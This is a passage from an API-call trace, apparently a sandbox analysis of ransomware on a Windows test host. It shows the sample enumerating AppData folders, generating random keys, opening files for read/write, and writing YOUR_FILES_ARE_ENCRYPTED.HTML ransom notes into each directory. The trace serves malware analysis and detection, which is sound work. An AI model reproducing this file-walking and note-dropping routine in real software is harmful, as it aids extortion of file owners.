RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0114.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0114.296] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=80) returned 1 [0114.296] CloseHandle (hObject=0x31c) returned 1 [0114.296] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x973d55c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="settings.ini", cAlternateFileName="")) returned 0 [0114.296] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.296] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0114.296] GetProcessHeap () returned 0x600000 [0114.296] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows sidebar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.297] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.298] CloseHandle (hObject=0x320) returned 1 [0114.298] GetProcessHeap () returned 0x600000 [0114.298] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.298] GetProcessHeap () returned 0x600000 [0114.298] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.299] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0114.299] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.299] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0114.299] GetProcessHeap () returned 0x600000 [0114.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0114.300] WriteFile (in: hFile=0x30c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0114.301] CloseHandle (hObject=0x30c) returned 1 [0114.301] GetProcessHeap () returned 0x600000 [0114.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.301] GetProcessHeap () returned 0x600000 [0114.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0114.302] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0114.302] StrStrIW (lpFirst="MicrosoftEdge", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.302] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge") returned 53 [0114.302] GetProcessHeap () returned 0x600000 [0114.302] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0114.302] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge" [0114.303] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\*" [0114.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.303] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0114.303] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="SharedCacheContainers", cAlternateFileName="SHARED~1")) returned 1 [0114.303] StrStrIW (lpFirst="SharedCacheContainers", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.303] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers") returned 75 [0114.303] GetProcessHeap () returned 0x600000 [0114.303] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.304] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers" [0114.304] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\*" [0114.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x435d739, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.304] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x435d739, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.304] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0xffffffff, cFileName="MicrosoftEdge_iecompat", cAlternateFileName="MICROS~1")) returned 1 [0114.304] StrStrIW (lpFirst="MicrosoftEdge_iecompat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.304] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat") returned 98 [0114.304] GetProcessHeap () returned 0x600000 [0114.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.305] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat" [0114.305] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\*" [0114.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0114.305] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="..", cAlternateFileName="")) returned 1 [0114.305] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0114.305] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.305] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\container.dat") returned 112 [0114.305] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0114.305] lstrlenW (lpString=".dat") returned 4 [0114.305] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0114.305] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoftedge\\sharedcachecontainers\\microsoftedge_iecompat\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0114.306] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=0) returned 1 [0114.306] CloseHandle (hObject=0x324) returned 1 [0114.306] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0114.306] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0114.306] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0114.306] GetProcessHeap () returned 0x600000 [0114.306] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompat\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoftedge\\sharedcachecontainers\\microsoftedge_iecompat\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.307] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.308] CloseHandle (hObject=0x31c) returned 1 [0114.308] GetProcessHeap () returned 0x600000 [0114.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.308] GetProcessHeap () returned 0x600000 [0114.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.309] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x435d739, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43f61d3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43f61d3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0xffffffff, cFileName="MicrosoftEdge_iecompatua", cAlternateFileName="MICROS~2")) returned 1 [0114.309] StrStrIW (lpFirst="MicrosoftEdge_iecompatua", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.309] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua") returned 100 [0114.309] GetProcessHeap () returned 0x600000 [0114.309] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.310] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua" [0114.310] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\*" [0114.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x435d739, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43f61d3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43f61d3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.310] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x435d739, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43f61d3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43f61d3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="..", cAlternateFileName="")) returned 1 [0114.310] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x43f61d3, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43f61d3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43f61d3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0114.310] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.310] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\container.dat") returned 114 [0114.310] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0114.310] lstrlenW (lpString=".dat") returned 4 [0114.310] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0114.310] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoftedge\\sharedcachecontainers\\microsoftedge_iecompatua\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0114.310] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=0) returned 1 [0114.310] CloseHandle (hObject=0x324) returned 1 [0114.310] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x43f61d3, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43f61d3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43f61d3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e90, dwReserved1=0x632df8, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0114.311] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.311] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0114.311] GetProcessHeap () returned 0x600000 [0114.311] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\MicrosoftEdge_iecompatua\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoftedge\\sharedcachecontainers\\microsoftedge_iecompatua\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.312] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.312] CloseHandle (hObject=0x31c) returned 1 [0114.312] GetProcessHeap () returned 0x600000 [0114.313] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.313] GetProcessHeap () returned 0x600000 [0114.313] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.313] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x435d739, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43f61d3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43f61d3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0xffffffff, cFileName="MicrosoftEdge_iecompatua", cAlternateFileName="MICROS~2")) returned 0 [0114.313] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.313] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0114.313] GetProcessHeap () returned 0x600000 [0114.313] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.314] CreateFileW 